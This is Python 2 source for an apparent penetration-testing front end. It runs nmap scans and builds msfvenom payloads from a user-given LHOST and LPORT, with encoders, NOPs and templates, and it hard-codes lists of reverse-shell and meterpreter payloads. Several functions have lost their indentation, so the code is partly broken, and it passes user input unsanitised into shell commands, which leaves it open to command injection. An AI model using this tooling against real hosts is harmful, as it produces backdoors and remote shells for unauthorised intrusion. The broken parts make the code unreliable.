def protoscan(ipaddr):
    # nmap IP protocol scan (-sO) of `ipaddr`; pauses before returning.
    os.system('clear')
    com = Command("nmap "+ipaddr+" -sO "+form+" "+filename).run()
    print com.output
    if com.error:
        print "\n[-] Error: "+com.error
    get = raw_input(bcolors.HEADER+"\n[*] Press any key to return..."+bcolors.ENDC)
    return
def idlescan(ipaddr):
    # nmap idle scan (-sI) of `ipaddr`.
    # NOTE(review): -sI normally requires a zombie-host argument, which is
    # not supplied here -- confirm this produces a usable scan.
    os.system('clear')
    com = Command("nmap "+ipaddr+" -sI "+form+" "+filename).run()
    print com.output
    if com.error:
        print "\n[-] Error: "+com.error
    get = raw_input(bcolors.HEADER+"\n[*] Press any key to return..."+bcolors.ENDC)
    return
def version(ipaddr):
    # nmap service/version detection (-sV) of `ipaddr`; pauses before returning.
    os.system('clear')
    com = Command("nmap "+ipaddr+" -sV "+form+" "+filename).run()
    print com.output
    if com.error:
        print "\n[-] Error: "+com.error
    get = raw_input(bcolors.HEADER+"\n[*] Press any key to return..."+bcolors.ENDC)
    return
def ackscan(ipaddr):
    # nmap ACK scan (-sA) of `ipaddr`; pauses before returning.
    os.system('clear')
    com = Command("nmap "+ipaddr+" -sA "+form+" "+filename).run()
    print com.output
    if com.error:
        print "\n[-] Error: "+com.error
    get = raw_input(bcolors.HEADER+"\n[*] Press any key to return..."+bcolors.ENDC)
    return
def windowscan(ipaddr):
    # nmap TCP window scan (-sW) of `ipaddr`; pauses before returning.
    os.system('clear')
    com = Command("nmap "+ipaddr+" -sW "+form+" "+filename).run()
    print com.output
    if com.error:
        print "\n[-] Error: "+com.error
    get = raw_input(bcolors.HEADER+"\n[*] Press any key to return..."+bcolors.ENDC)
    return
def rpcscan(ipaddr):
os.system('clear')
com = Command("nmap "+ipaddr+" -sR "+form+" "+filename).run()
print com.output
print "\n[-] Error: "+com.error
get = raw_input(bcolors.HEADER+"\n[*] Press any key to return..."+bcolors.ENDC)
return
def listscan(ipaddr):
    # nmap list scan (-sL): enumerate targets without probing them.
    os.system('clear')
    com = Command("nmap "+ipaddr+" -sL "+form+" "+filename).run()
    print com.output
    if com.error:
        print "\n[-] Error: "+com.error
    get = raw_input(bcolors.HEADER+"\n[*] Press any key to return..."+bcolors.ENDC)
    return
def osscan(ipaddr):
    # nmap OS fingerprinting (-O) of `ipaddr`; pauses before returning.
    os.system('clear')
    com = Command("nmap "+ipaddr+" -O "+form+" "+filename).run()
    print com.output
    if com.error:
        print "\n[-] Error: "+com.error
    get = raw_input(bcolors.HEADER+"\n[*] Press any key to return..."+bcolors.ENDC)
    return
def multiscan(ipaddr,parameter):
os.system('clear')
banner(name,length_name)
mystring = ""
for i in parameter:
mystring = mystring + i
com = Command("nmap "+ipaddr+mystring+form+" "+filename).run()
print com.output
if com.error:
print bcolors.FAIL + bcolors.BOLD+"\n[-] Error: "+com.error + bcolors.ENDC
get = raw_input(bcolors.HEADER+"\n[*] Press any key to return..."+bcolors.ENDC)
return
def nmapmain():
    # Interactive NMAP front-end: pick a reachable target, optionally an
    # output file, then loop over a menu dispatching to the scan helpers.
    os.system('clear')
    global name
    global length_name
    os.system('clear')
    name = " E A S Y P E N T E S T I N G F R A M E W O R K v 1 . 0 "
    length_name = len(name)
    banner(name,length_name)
    print bcolors.HEADER + bcolors.BOLD+"\n[+] Welcome to NMAP !\n"+ bcolors.ENDC
    ipaddr = raw_input("\n[*] Enter the host ip or host name (Eg: 192.168.0.1 or google.com): ")
    print bcolors.HEADER + bcolors.BOLD+"\n[*] Please Wait ...\n" +bcolors.ENDC
    # Re-prompt until the host answers a ping (verifyhost returns 1 on failure).
    while (verifyhost(ipaddr)):
        print bcolors.FAIL + bcolors.BOLD+"\n[-] Error: Invalid host or host seems down try pinging first !\n"+ bcolors.ENDC
        ipaddr = raw_input("\n[*] Enter the host ip or host name (Eg: 192.168.0.1 or google.com): ")
    print bcolors.HEADER + bcolors.BOLD+"\n[*] Done ...\n" +bcolors.ENDC
    chc=raw_input("\n[*] Would you like to store the output in a file (Y/N): ")
    if chc == 'Y' or chc == 'y' or chc == 'Yes' or chc == 'yes':
        # `form`/`filename` are module globals read by every scan helper.
        global form
        global formatfile
        global filename
        form = raw_input("\n[*] Enter the file format: Output scan in normal(O) or XML(X) or Grepable (G): ")
        while form != 'O' and form != 'X' and form != 'G':
            form = raw_input("\n[*] Enter the file format: Output scan in normal(O) or XML(X) or Grepable (G): ")
        # NOTE(review): `dict` shadows the builtin here (and below).
        dict = {'O':' -oO ','X':' -oX ','G':' -oG '}
        form = dict[form]
        filename=raw_input("\n[*] Enter the filename: ")
    else:
        form=""
        filename=""
    while True:
        os.system('clear')
        banner(name,length_name)
        print bcolors.HEADER + bcolors.BOLD+"\n[*] Choose your scan type: "+ bcolors.ENDC
        mychoice=raw_input("\n1) Basic Scanning\n2) Advanced Scanning\n3) Ping Scan\n4) UDP Scan\n5) IP Protocol Scan\n6) Idle Scanning\n7) Version detection\n8) ACK Scan\n9) Window Scan \n10) RPC Scan \n11) List Scan\n12) OS Fingerprinting\n13) Change host details\n14) Return to previous menu\n"+bcolors.HEADER + bcolors.BOLD+"\n[*] Choose your option (You can choose multiple options at once by using ',' as a delimiter: "+bcolors.ENDC)
        mylist=[]
        mylist = mychoice.split(',')
        # Single selection: dispatch straight to the matching helper.
        if len(mylist)==1:
            choice = mylist[0]
            if int(choice) == 1:
                basicscan(ipaddr)
            elif int(choice) == 2:
                advancedscan(ipaddr)
            elif int(choice) ==3:
                pingscan(ipaddr)
            elif int(choice)==4:
                udpscan(ipaddr)
            elif int(choice) == 5:
                protoscan(ipaddr)
            elif int(choice) ==6:
                idlescan(ipaddr)
            elif int(choice)==7:
                version(ipaddr)
            elif int(choice) == 8:
                ackscan(ipaddr)
            elif int(choice) ==9:
                windowscan(ipaddr)
            elif int(choice) == 10:
                rpcscan(ipaddr)
            elif int(choice) ==11:
                listscan(ipaddr)
            elif int(choice)==12:
                osscan(ipaddr)
            elif int(choice)==13:
                nmapmain()
            elif int(choice)==14:
                options()
            else:
                print bcolors.FAIL + bcolors.BOLD+"\n[-] Error: Invalid Input !"+ bcolors.ENDC
        # Multiple selections: collect flag fragments and run one combined scan.
        if len(mylist)>1:
            global multi
            multi = []
            if '1' in mylist:
                mychoice=raw_input("\n\n1) TCP Connect\n2) SYN Scan\n\n"+bcolors.HEADER + bcolors.BOLD+"Choose your option: "+bcolors.ENDC)
                dict = {'1': ' -sT ', '2': ' -sS '}
                multi.append(dict[mychoice])
            if '2' in mylist:
                dict = {'1': ' -sF ', '2': ' -sN ', '3': ' -sX '}
                mychoice=raw_input("\n\n1) FIN Scan\n2) Null Scan\n3) Xmas Tree Scan\n\n"+bcolors.HEADER + bcolors.BOLD+"Choose your option: "+bcolors.ENDC)
                multi.append(dict[mychoice])
            if '3' in mylist:
                multi.append(' -sP ')
            if '4' in mylist:
                multi.append(' -sU ')
            if '5' in mylist:
                # NOTE(review): '5' appends -sP again although the single-choice
                # path maps 5 to protoscan (-sO) -- looks like a copy/paste slip.
                multi.append(' -sP ')
            if '6' in mylist:
                multi.append(' -sI ')
            if '7' in mylist:
                multi.append(' -sV ')
            if '8' in mylist:
                multi.append(' -sA ')
            if '9' in mylist:
                # NOTE(review): single-choice 9 is windowscan (-sW) but this
                # appends -sR; '11' likewise gets -sW -- confirm intended mapping.
                multi.append(' -sR ')
            if '10' in mylist:
                multi.append(' -sL ')
            if '11' in mylist:
                multi.append(' -sW ')
            if '12' in mylist:
                multi.append(' -O ')
            if '13' in mylist:
                print bcolors.FAIL + bcolors.BOLD+"\n[-] Error: Invalid Input !"+ bcolors.ENDC
                continue
            multiscan(ipaddr,multi)
def checkpath(path):
    # Re-prompt until `path` names an existing directory, then return it.
    # NOTE(review): running "cd <path>" in a child process only tests that the
    # directory exists -- it cannot change this process's cwd, and it working
    # at all depends on how Command executes the string (shell builtin) -- confirm.
    com = Command("cd "+path).run()
    while com.error:
        print bcolors.FAIL + bcolors.BOLD+ "\n[-] Error: No such directory"+bcolors.ENDC
        path = raw_input(bcolors.HEADER+"\n[*] Please provide a valid path(Eg: '/root/Desktop/'): "+ bcolors.ENDC)
        com = Command("cd "+path).run()
    return path
#Function to get details of platforms
def platforms():
    # Show msfvenom's supported platforms and return the one the user picks.
    os.system('clear')
    os.system('clear')
    print bcolors.HEADER + bcolors.BOLD+"\n[*] Please Wait ..." +bcolors.ENDC
    com = Command("msfvenom --help-platforms").run()
    # The listing is read from com.error -- presumably msfvenom writes it to
    # stderr; confirm against the Command helper's semantics.
    mylist = com.error
    mylist=mylist.split('\n')
    mylist[1]=mylist[1].strip('\t')
    mynew = []
    os.system('clear')
    os.system('clear')
    # Line 1 of the output holds the comma-separated platform names.
    mynew = mylist[1].split(',')
    for i in range(0,len(mynew)):
        if ' ' in mynew[i]:
            mynew[i]=mynew[i].strip()
    print bcolors.HEADER+ "Platforms available: "+bcolors.ENDC
    for i in range(0,len(mynew)):
        print str(i+1)+". "+mynew[i]
    choice = input(bcolors.HEADER + bcolors.BOLD+"\n[*] Select your platform(1 - "+str(len(mynew))+"): "+ bcolors.ENDC)
    # Menu is 1-based, list is 0-based; pf stays unbound if choice is out of range.
    for i in range(0,len(mynew)+1):
        if i == choice:
            pf=mynew[i-1]
    print bcolors.HEADER + bcolors.BOLD+"\nYour platform: "+pf+ bcolors.ENDC
    return pf
#Function to get details of NOPS
def nops():
    # List msfvenom NOP generators and return the user's chosen one.
    os.system('clear')
    os.system('clear')
    mylist = []
    print bcolors.HEADER + bcolors.BOLD+"\n[*] Please Wait ..." +bcolors.ENDC
    com = Command("msfvenom -l nops | cut -d \" \" -f 5").run()
    mylist = com.output
    os.system('clear')
    os.system('clear')
    print bcolors.FAIL + bcolors.BOLD+ com.error + bcolors.ENDC
    mylist = mylist.split('\n')
    print bcolors.HEADER +"NOPS available: "+ bcolors.ENDC
    # The first 6 lines are header noise, hence the -5 display offset; stop
    # at the 'x86/single_byte' sentinel entry.
    for i in range(0,len(mylist)):
        if i>5:
            print str(i-5)+". "+mylist[i]
        if 'x86/single_byte' in mylist[i]:
            break
    choice = input(bcolors.HEADER + bcolors.BOLD+"\n\n[*] Select your nop(1 - "+str(len(mylist)-8)+"): "+ bcolors.ENDC)
    # `nop` stays unbound if choice is out of range.
    for i in range(0,len(mylist)+1):
        if i-5 == choice:
            nop = mylist[i]
    print bcolors.HEADER + bcolors.BOLD+"\nYour nop: "+nop+ bcolors.ENDC
    return nop
#Function to get list of encoders
def encoders():
os.system('clear')
os.system('clear')
mylist = []
print bcolors.HEADER + bcolors.BOLD+"\n[*] Please Wait ..." +bcolors.ENDC
com = Command("msfvenom -l encoders | cut -d \" \" -f 5").run()
mylist = com.output
os.system('clear')
os.system('clear')
print bcolors.FAIL + bcolors.BOLD+ com.error + bcolors.ENDC
mylist = mylist.split('\n')
print bcolors.HEADER + "Encoders available: " +bcolors.ENDC
for i in range(0,len(mylist)+1):
if i>5:
print str(i-5)+". "+mylist[i]
if 'x86/unicode_upper' in mylist[i]:
break
choice = input(bcolors.HEADER + bcolors.BOLD+"\n\n[*] Select your encoder(1 - "+str(len(mylist)-8)+"): "+ bcolors.ENDC)
for i in range(0,len(mylist)):
if i-5 == choice:
encoder = mylist[i]
print bcolors.HEADER + bcolors.BOLD+"\n[+] Your encoder: "+encoder+ bcolors.ENDC
return encoder
#Function to get formats
def myformat():
    # List msfvenom output formats (executable + transform) and return the pick.
    os.system('clear')
    os.system('clear')
    print bcolors.HEADER + bcolors.BOLD+"\n[*] Please Wait ..." +bcolors.ENDC
    com = Command("msfvenom --help-formats").run()
    # Listing is read from stderr (com.error) like platforms() above.
    mylist = com.error
    os.system('clear')
    os.system('clear')
    mylist=mylist.split('\n')
    mylist[1]=mylist[1].strip('\t')
    mylist[3]=mylist[3].strip('\t')
    mynew = []
    # Lines 1 and 3 hold the two comma-separated format lists.
    mynew = mylist[1].split(',')
    mynew = mynew + mylist[3].split(',')
    for i in range(0,len(mynew)):
        if ' ' in mynew[i]:
            mynew[i]=mynew[i].strip()
    print bcolors.HEADER +"[*] Formats available: "+bcolors.ENDC
    for i in range(0,len(mynew)):
        print str(i+1)+". "+mynew[i]
    choice = input(bcolors.HEADER + bcolors.BOLD+"\n[*] Select your format(1 - "+str(len(mynew))+"): "+ bcolors.ENDC)
    # `myform` stays unbound if choice is out of range.
    for i in range(0,len(mynew)+1):
        if i == choice:
            myform = mynew[i-1]
    print bcolors.HEADER + bcolors.BOLD+"\n[+] Your format: "+ myform + bcolors.ENDC
    return myform
#function to initialise the various options in a payload
def actualpayload(payload):
    # Collect LHOST/LPORT/filename/path plus optional msfvenom flags for
    # `payload`, build the msfvenom command line, and run it.
    os.system('clear')
    os.system('clear')
    print bcolors.HEADER + bcolors.BOLD+"\n[*] Payload creation: "+bcolors.ENDC
    inp = raw_input(bcolors.HEADER+"\n[*] Press any key to proceed with payload: "+bcolors.ENDC+payload+bcolors.HEADER+" or press 'b' to select payload again: "+bcolors.ENDC)
    # 'b' restarts payload selection (recursive call; falls through afterwards).
    if inp == 'b' or inp =='B':
        createpayload()
    lhost = raw_input( bcolors.HEADER+"\n[*] Please provide the Local Host (LHOST): "+bcolors.ENDC)
    lport = raw_input( bcolors.HEADER+"\n[*] Please provide the Local Host (LPORT): "+bcolors.ENDC)
    filename = raw_input( bcolors.HEADER+"\n[*] Please enter the name of the file with extension: "+bcolors.ENDC)
    path = raw_input(bcolors.HEADER+"\n[*] Please provide a path: "+bcolors.ENDC)
    path=checkpath(path)
    os.system('clear')
    os.system('clear')
    print bcolors.HEADER+bcolors.BOLD+ "\n[*] Your options till now:"+bcolors.ENDC+bcolors.HEADER+"\n\n[+] Payload: "+bcolors.ENDC+payload+bcolors.HEADER+"\n[+] LHOST: "+bcolors.ENDC+lhost+bcolors.HEADER+"\n[+] LPORT: "+bcolors.ENDC+lport+bcolors.HEADER+"\n[+] Filename: "+bcolors.ENDC+filename+bcolors.HEADER+"\n[+] Path: "+bcolors.ENDC+path+"\n"
    get = raw_input(bcolors.HEADER+"\n[*] Press any key to continue or 'b' to reset selected options: "+ bcolors.ENDC)
    if get == 'b' or get == 'B':
        actualpayload(payload)
    mychoice = raw_input( bcolors.HEADER+bcolors.BOLD+"\n[*] These are your payload options:"+bcolors.ENDC+" \n\n1) Encoders\n2) NOPS\n3) Formats\n4) Architecture\n5) Platform\n6) Iterations\n7) Template\n\n[*] Please select one or more options using ',' as a delimiter: ")
    command="msfvenom -p "+payload+" LHOST="+lhost+" LPORT="+lport
    mylist=[]
    mylist = mychoice.split(',')
    # Each selected option appends one msfvenom flag to `command`.
    if '1' in mylist:
        encoder=encoders()
        encoder = ' -e '+encoder
        command = command + encoder
    if '2' in mylist:
        nop=nops()
        nop = ' -n '+nop
        command = command + nop
    if '3' in mylist:
        formats=myformat()
        formats = ' -f '+formats
        command = command +formats
    if '4' in mylist:
        os.system("clear")
        os.system('clear')
        architecture = raw_input(bcolors.HEADER+"\n[*] Enter the target architecture (x64/x86): "+bcolors.ENDC)
        architecture = " -a "+architecture
        command = command +architecture
    if '5' in mylist:
        platform=platforms()
        platform = " --platform "+platform
        command = command +platform
    if '6' in mylist:
        os.system("clear")
        os.system('clear')
        iterations = raw_input(bcolors.HEADER+"\n[*] Enter the number of iterations (1-200): "+bcolors.ENDC)
        iterations = " -i "+iterations
        command = command +iterations
    if '7' in mylist:
        os.system("clear")
        os.system('clear')
        template = raw_input(bcolors.HEADER+"\n[*] Enter the name of the template: "+bcolors.ENDC)
        template = " -x "+template
        command = command + template
    # Output file: join path and filename, inserting '/' only when needed.
    if path != "":
        if path[len(path)-1] == '/':
            command = command+ ' -o '+path+filename
        else:
            command = command+ ' -o '+path+"/"+filename
    else:
        command = command + ' -o '+filename
    os.system("clear")
    os.system('clear')
    print bcolors.HEADER + bcolors.BOLD+"\n[*] Please Wait ..." +bcolors.ENDC
    com = Command(command).run()
    os.system("clear")
    os.system('clear')
    # msfvenom progress/result text arrives on stderr (com.error).
    print bcolors.FAIL + bcolors.BOLD+"\n[*] "+com.error+bcolors.ENDC
    opt = raw_input(bcolors.HEADER+"\n\n[*] Press any key to return or press 'b' to register payload options: "+ bcolors.ENDC)
    if opt == 'b' or opt == 'B':
        actualpayload(payload)
    return
#function to get name of payload
def createpayload():
    # Let the user pick an msfvenom payload (full list / keyword search /
    # common-payload shortlist), then hand it to actualpayload().
    while 1:
        os.system('clear')
        os.system('clear')
        banner(name,length_name)
        print bcolors.HEADER + bcolors.BOLD+"\n[+] Select your option.... "+ bcolors.ENDC
        mychoice=raw_input("\n1) List all payloads\n2) List payloads by keyword (Eg: windows, python, linux)\n3) List most common payloads\n4) Return to previous menu\n\n"+bcolors.HEADER+bcolors.BOLD+"[*] Choose one option: "+bcolors.ENDC)
        if mychoice == '1':
            mylist = []
            print bcolors.HEADER + bcolors.BOLD+"\n\n[*] Please Wait ...\n" +bcolors.ENDC
            com = Command("msfvenom -l payloads | cut -d \" \" -f 5").run()
            mylist = com.output
            print bcolors.FAIL + bcolors.BOLD+ com.error + bcolors.ENDC
            mylist = mylist.split('\n')
            # First 6 lines are header noise (-5 display offset); stop at the
            # last listed payload sentinel.
            for i in range(0,len(mylist)):
                if i > 5:
                    print str(i-5)+". "+mylist[i]
                if 'windows/x64/vncinject/reverse_winhttps' in mylist[i]:
                    break
            choice = input(bcolors.HEADER + bcolors.BOLD+"\n\n[*] Select your payload(1 - "+str(len(mylist)-8)+"): "+ bcolors.ENDC)
            for i in range(0,len(mylist)):
                if i-5 == choice:
                    payload = mylist[i]
            print bcolors.HEADER + bcolors.BOLD+"\nYour payload: "+bcolors.ENDC+payload
            get = raw_input(bcolors.HEADER+"\n[*] Press any key to proceed or 'b' to reselect payload: "+ bcolors.ENDC)
            if get == 'b' or get == 'B':
                continue
            else:
                break
        elif mychoice == '2':
            keyword=raw_input(bcolors.HEADER+"\n[*] Enter keyword: "+bcolors.ENDC)
            print bcolors.HEADER + bcolors.BOLD+"\n[*] Please Wait ...\n" +bcolors.ENDC
            com = Command("msfvenom -l payloads | grep "+keyword+" | cut -d \" \" -f 5").run()
            mylist = com.output
            if mylist == "":
                print bcolors.FAIL + bcolors.BOLD+ "\n[-] Error: Wrong keyword" + bcolors.ENDC
                get = raw_input(bcolors.HEADER+"\n[*] Press any key to reset ... "+ bcolors.ENDC)
                continue
            if com.error:
                print bcolors.FAIL + bcolors.BOLD+ com.error + bcolors.ENDC
                get = raw_input(bcolors.HEADER+"\n[*] Press any key to reset ... "+ bcolors.ENDC)
                continue
            mylist = mylist.split('\n')
            for i in range(1,len(mylist)):
                print str(i)+". "+mylist[i-1]
            choice = input(bcolors.HEADER + bcolors.BOLD+"\n\n[*] Select your payload(1 - "+str(len(mylist)-1)+"): "+ bcolors.ENDC)
            for i in range(1,len(mylist)):
                if i == choice:
                    payload = mylist[i-1]
            print bcolors.HEADER + bcolors.BOLD+"\n[+] Your payload: "+bcolors.ENDC+payload
            get = raw_input(bcolors.HEADER+"\n[*] Press any key to proceed or 'b' to reselect payload: "+ bcolors.ENDC)
            if get == 'b' or get == 'B':
                continue
            else:
                break
        elif mychoice == '3':
            # Hard-coded shortlists indexed by platform: [windows, python, linux, unix].
            payloadlist = [ ['windows/meterpreter/reverse_tcp','windows/shell/bind_tcp','windows/shell/reverse_tcp','windows/shell_bind_tcp','windows/shell_reverse_tcp','windows/x64/meterpreter/bind_tcp','windows/x64/meterpreter/bind_tcp_uuid','windows/x64/meterpreter/reverse_http','windows/x64/meterpreter/reverse_https','windows/x64/meterpreter/reverse_tcp','windows/x64/meterpreter/reverse_tcp_uuid','windows/x64/meterpreter_bind_tcp','windows/x64/meterpreter_reverse_http','windows/x64/meterpreter_reverse_https','windows/x64/meterpreter_reverse_tcp','windows/x64/powershell_bind_tcp','windows/x64/powershell_reverse_tcp','windows/x64/shell/bind_ipv6_tcp','windows/x64/shell/bind_ipv6_tcp_uuid','windows/x64/shell/bind_tcp','windows/x64/shell/bind_tcp_uuid','windows/x64/shell/reverse_tcp','windows/x64/shell/reverse_tcp_uuid','windows/x64/shell_bind_tcp','windows/x64/shell_reverse_tcp','windows/meterpreter/bind_tcp','windows/meterpreter/reverse_http','windows/meterpreter/reverse_https','windows/meterpreter_reverse_http','windows/meterpreter_reverse_https','windows/meterpreter_reverse_tcp','cmd/windows/generic','cmd/windows/powershell_bind_tcp','cmd/windows/powershell_reverse_tcp','cmd/windows/reverse_powershell'],['python/meterpreter/bind_tcp','python/meterpreter/reverse_http','python/meterpreter/reverse_https','python/meterpreter/reverse_tcp','python/meterpreter/reverse_tcp_ssl','python/meterpreter_bind_tcp','python/meterpreter_reverse_http','python/meterpreter_reverse_https','python/meterpreter_reverse_tcp'],['linux/x64/meterpreter/bind_tcp','linux/x64/meterpreter/reverse_tcp','linux/x64/meterpreter_reverse_http','linux/x64/meterpreter_reverse_https','linux/x64/meterpreter_reverse_tcp','linux/x64/shell/bind_tcp','linux/x64/shell/reverse_tcp','linux/x64/shell_bind_tcp','linux/x64/shell_find_port','linux/x64/shell_reverse_tcp' 
            ],['cmd/unix/bind_netcat','cmd/unix/bind_nodejs','cmd/unix/bind_perl','cmd/unix/generic','cmd/unix/interact','cmd/unix/reverse','cmd/unix/reverse_bash','cmd/unix/reverse_bash_telnet_ssl','cmd/unix/reverse_ncat_ssl','cmd/unix/reverse_netcat','cmd/unix/reverse_nodejs','cmd/unix/reverse_openssl','cmd/unix/reverse_perl','cmd/unix/reverse_perl_ssl','cmd/unix/reverse_php_ssl','cmd/unix/reverse_python','cmd/unix/reverse_python_ssl']]
            print bcolors.HEADER + bcolors.BOLD+"\n[+] Select the platform ... "+ bcolors.ENDC
            choice=raw_input("\n1) Windows\n2) Python\n3) Linux\n4) Unix\n\n"+bcolors.HEADER+bcolors.BOLD+"[*] Choose one option: "+bcolors.ENDC)
            plat = ['Windows','Python','Linux','Unix']
            print bcolors.HEADER+"\n[*]Platform: "+plat[int(choice)-1]+"\n"+bcolors.ENDC
            for i in range (1,len(payloadlist[int(choice)-1])):
                print str(i)+". "+ payloadlist[int(choice)-1][i]
            chc = input(bcolors.HEADER + bcolors.BOLD+"\n\n[*] Select your payload(1 - "+str(len(payloadlist[int(choice)-1])-1)+"): "+ bcolors.ENDC)
            for i in range(0,len(payloadlist[int(choice)-1])):
                if i == chc:
                    payload = payloadlist[int(choice)-1][i]
            print bcolors.HEADER + bcolors.BOLD+"\n[+] Your payload: "+bcolors.ENDC+payload
            get = raw_input(bcolors.HEADER+"\n[*] Press any key to proceed or 'b' to reselect payload: "+ bcolors.ENDC)
            if get == 'b' or get == 'B':
                continue
            else:
                break
            # NOTE(review): unreachable -- both branches above transfer control.
            get = raw_input(bcolors.HEADER+"\nPress any key to return..."+ bcolors.ENDC)
        elif mychoice == '4':
            metamain()
    # Reached via `break` once a payload is chosen.
    # NOTE(review): `payload` may be unbound if the numeric choice matched nothing.
    actualpayload(payload)
    get = raw_input(bcolors.HEADER+"\n[*] Press any key to return..."+ bcolors.ENDC)
    return
def payload_listener():
    # Same payload-selection menu as createpayload(), but RETURNS the chosen
    # payload name instead of launching actualpayload().
    # NOTE(review): this is a near-duplicate of createpayload() -- candidates
    # for sharing a common helper.
    while 1:
        os.system('clear')
        os.system('clear')
        banner(name,length_name)
        print bcolors.HEADER + bcolors.BOLD+"\n[+] Select your option.... "+ bcolors.ENDC
        mychoice=raw_input("\n1) List all payloads\n2) List payloads by keyword (Eg: windows, python, linux)\n3) List most common payloads\n4) Return to previous menu\n\n"+bcolors.HEADER+bcolors.BOLD+"[*] Choose one option: "+bcolors.ENDC)
        if mychoice == '1':
            mylist = []
            print bcolors.HEADER + bcolors.BOLD+"\n\n[*] Please Wait ...\n" +bcolors.ENDC
            com = Command("msfvenom -l payloads | cut -d \" \" -f 5").run()
            mylist = com.output
            print bcolors.FAIL + bcolors.BOLD+ com.error + bcolors.ENDC
            mylist = mylist.split('\n')
            # First 6 lines are header noise (-5 display offset).
            for i in range(0,len(mylist)):
                if i > 5:
                    print str(i-5)+". "+mylist[i]
                if 'windows/x64/vncinject/reverse_winhttps' in mylist[i]:
                    break
            choice = input(bcolors.HEADER + bcolors.BOLD+"\n\n[*] Select your payload(1 - "+str(len(mylist)-8)+"): "+ bcolors.ENDC)
            for i in range(0,len(mylist)):
                if i-5 == choice:
                    payload = mylist[i]
            print bcolors.HEADER + bcolors.BOLD+"\nYour payload: "+bcolors.ENDC+payload
            get = raw_input(bcolors.HEADER+"\n[*] Press any key to proceed or 'b' to reselect payload: "+ bcolors.ENDC)
            if get == 'b' or get == 'B':
                continue
            else:
                break
        elif mychoice == '2':
            keyword=raw_input(bcolors.HEADER+"\n[*] Enter keyword: "+bcolors.ENDC)
            print bcolors.HEADER + bcolors.BOLD+"\n[*] Please Wait ...\n" +bcolors.ENDC
            com = Command("msfvenom -l payloads | grep "+keyword+" | cut -d \" \" -f 5").run()
            mylist = com.output
            if mylist == "":
                print bcolors.FAIL + bcolors.BOLD+ "\n[-] Error: Wrong keyword" + bcolors.ENDC
                get = raw_input(bcolors.HEADER+"\n[*] Press any key to reset ... "+ bcolors.ENDC)
                continue
            if com.error:
                print bcolors.FAIL + bcolors.BOLD+ com.error + bcolors.ENDC
                get = raw_input(bcolors.HEADER+"\n[*] Press any key to reset ... "+ bcolors.ENDC)
                continue
            mylist = mylist.split('\n')
            for i in range(1,len(mylist)):
                print str(i)+". "+mylist[i-1]
            choice = input(bcolors.HEADER + bcolors.BOLD+"\n\n[*] Select your payload(1 - "+str(len(mylist)-1)+"): "+ bcolors.ENDC)
            for i in range(1,len(mylist)):
                if i == choice:
                    payload = mylist[i-1]
            print bcolors.HEADER + bcolors.BOLD+"\n[+] Your payload: "+bcolors.ENDC+payload
            get = raw_input(bcolors.HEADER+"\n[*] Press any key to proceed or 'b' to reselect payload: "+ bcolors.ENDC)
            if get == 'b' or get == 'B':
                continue
            else:
                break
        elif mychoice == '3':
            # Hard-coded shortlists indexed by platform: [windows, python, linux, unix].
            payloadlist = [ ['windows/meterpreter/reverse_tcp','windows/shell/bind_tcp','windows/shell/reverse_tcp','windows/shell_bind_tcp','windows/shell_reverse_tcp','windows/x64/meterpreter/bind_tcp','windows/x64/meterpreter/bind_tcp_uuid','windows/x64/meterpreter/reverse_http','windows/x64/meterpreter/reverse_https','windows/x64/meterpreter/reverse_tcp','windows/x64/meterpreter/reverse_tcp_uuid','windows/x64/meterpreter_bind_tcp','windows/x64/meterpreter_reverse_http','windows/x64/meterpreter_reverse_https','windows/x64/meterpreter_reverse_tcp','windows/x64/powershell_bind_tcp','windows/x64/powershell_reverse_tcp','windows/x64/shell/bind_ipv6_tcp','windows/x64/shell/bind_ipv6_tcp_uuid','windows/x64/shell/bind_tcp','windows/x64/shell/bind_tcp_uuid','windows/x64/shell/reverse_tcp','windows/x64/shell/reverse_tcp_uuid','windows/x64/shell_bind_tcp','windows/x64/shell_reverse_tcp','windows/meterpreter/bind_tcp','windows/meterpreter/reverse_http','windows/meterpreter/reverse_https','windows/meterpreter_reverse_http','windows/meterpreter_reverse_https','windows/meterpreter_reverse_tcp','cmd/windows/generic','cmd/windows/powershell_bind_tcp','cmd/windows/powershell_reverse_tcp','cmd/windows/reverse_powershell'],['python/meterpreter/bind_tcp','python/meterpreter/reverse_http','python/meterpreter/reverse_https','python/meterpreter/reverse_tcp','python/meterpreter/reverse_tcp_ssl','python/meterpreter_bind_tcp','python/meterpreter_reverse_http','python/meterpreter_reverse_https','python/meterpreter_reverse_tcp'],['linux/x64/meterpreter/bind_tcp','linux/x64/meterpreter/reverse_tcp','linux/x64/meterpreter_reverse_http','linux/x64/meterpreter_reverse_https','linux/x64/meterpreter_reverse_tcp','linux/x64/shell/bind_tcp','linux/x64/shell/reverse_tcp','linux/x64/shell_bind_tcp','linux/x64/shell_find_port','linux/x64/shell_reverse_tcp' 
            ],['cmd/unix/bind_netcat','cmd/unix/bind_nodejs','cmd/unix/bind_perl','cmd/unix/generic','cmd/unix/interact','cmd/unix/reverse','cmd/unix/reverse_bash','cmd/unix/reverse_bash_telnet_ssl','cmd/unix/reverse_ncat_ssl','cmd/unix/reverse_netcat','cmd/unix/reverse_nodejs','cmd/unix/reverse_openssl','cmd/unix/reverse_perl','cmd/unix/reverse_perl_ssl','cmd/unix/reverse_php_ssl','cmd/unix/reverse_python','cmd/unix/reverse_python_ssl']]
            print bcolors.HEADER + bcolors.BOLD+"\n[+] Select the platform ... "+ bcolors.ENDC
            choice=raw_input("\n1) Windows\n2) Python\n3) Linux\n4) Unix\n\n"+bcolors.HEADER+bcolors.BOLD+"[*] Choose one option: "+bcolors.ENDC)
            plat = ['Windows','Python','Linux','Unix']
            print bcolors.HEADER+"\n[*]Platform: "+plat[int(choice)-1]+"\n"+bcolors.ENDC
            for i in range (1,len(payloadlist[int(choice)-1])):
                print str(i)+". "+ payloadlist[int(choice)-1][i]
            chc = input(bcolors.HEADER + bcolors.BOLD+"\n\n[*] Select your payload(1 - "+str(len(payloadlist[int(choice)-1])-1)+"): "+ bcolors.ENDC)
            for i in range(0,len(payloadlist[int(choice)-1])):
                if i == chc:
                    payload = payloadlist[int(choice)-1][i]
            print bcolors.HEADER + bcolors.BOLD+"\n[+] Your payload: "+bcolors.ENDC+payload
            get = raw_input(bcolors.HEADER+"\n[*] Press any key to proceed or 'b' to reselect payload: "+ bcolors.ENDC)
            if get == 'b' or get == 'B':
                continue
            else:
                break
            # NOTE(review): unreachable -- both branches above transfer control.
            get = raw_input(bcolors.HEADER+"\nPress any key to return..."+ bcolors.ENDC)
        elif mychoice == '4':
            return
    # Reached via `break` once a payload is chosen.
    # NOTE(review): `payload` may be unbound if the numeric choice matched nothing.
    return payload
